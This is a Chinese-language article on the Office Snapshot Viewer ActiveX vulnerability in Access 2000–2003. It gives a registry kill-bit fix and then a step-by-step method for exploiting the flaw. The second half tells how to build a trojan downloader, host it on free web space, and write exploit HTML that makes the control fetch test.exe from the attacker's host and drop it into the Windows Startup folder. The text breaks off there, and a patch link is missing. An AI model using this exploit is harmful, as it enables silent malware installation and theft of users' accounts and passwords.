本次Access漏洞除Office2007版本外,在以前的版本中廣泛存在。由於用戶在安裝Office的時候很多都是選擇的默認安裝,附帶也安裝了Access,所以漏洞威脅的用戶群數量非常的巨大。
HTTPGET功能導致漏洞出現
本次的Access漏洞的全名稱為“MicrosoftOfficeSnapshotViewerActiveXExploit漏洞”,是一個ActiveX控件漏洞。該漏洞存在於snapvIEw.ocx控件中,出現的原因是因為該控件具有HTTPGET功能,這個功能可以從指定的網址下載指定的文件。
黑客要利用該漏洞,先要特制一個惡意網站引誘用戶訪問。當用戶打開該網頁的時候,惡意網址就賦給了HTTPGET功能,該功能被激活後就偷偷從惡意網址下載病毒,這樣病毒就可以神不知鬼不覺地進入用戶的系統中,威脅用戶的各種賬號和密碼。受這個漏洞影響的Access版本有2003、2002、2000。
Access漏洞解決方案
方案1:現在已經有了該漏洞的補丁了,請大家趕緊到
方案2:將以下內容復制在記事本中,另存為1.reg,然後雙擊導入注冊表也可以堵上漏洞。
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MacHINESOFTWAREMicrosoftInternetExplorerActiveXCompatibility{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“CompatibilityFlags”=dWord:00000400
[HKEY_LOCAL_MacHINESOFTWAREMicrosoftInternetExplorerActiveXCompatibility{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“CompatibilityFlags”=dWord:00000400
[HKEY_LOCAL_MacHINESOFTWAREMicrosoftInternetExplorerActiveXCompatibility{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“CompatibilityFlags”=dWord:00000400
目前黑客利用Access漏洞的主要方式
方式1:寫入啟動項
先申請一個免費的Web空間,用MinidownloaderbySEC配置網頁木馬,在“URL”處輸入網頁木馬地址,再點擊“Creat”,又再彈出窗口中將文件保存為test.exe,這樣就網頁木馬就配置好了。
接著將test.exe上傳到先前申請的免費空間裡面,病毒地址就是:http://(這裡是申請的空間地址)/test.exe。將以下漏洞的利用代碼復制粘貼到新建的記事本裡,另存為test.Html。
<Html>
<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′id='obj'></object>
<scriptlanguage='Javascript'>
varbuf1=‘http://(這裡是申請的空間地址)/test.exe';
varbuf2=‘C:/DocumentsandSettings/AllUsers/「開始」菜單/程序/啟動/test.exe';
obj.SnapshotPath=buf1;
obj.CompressedPath=buf2;
</script>
</Html>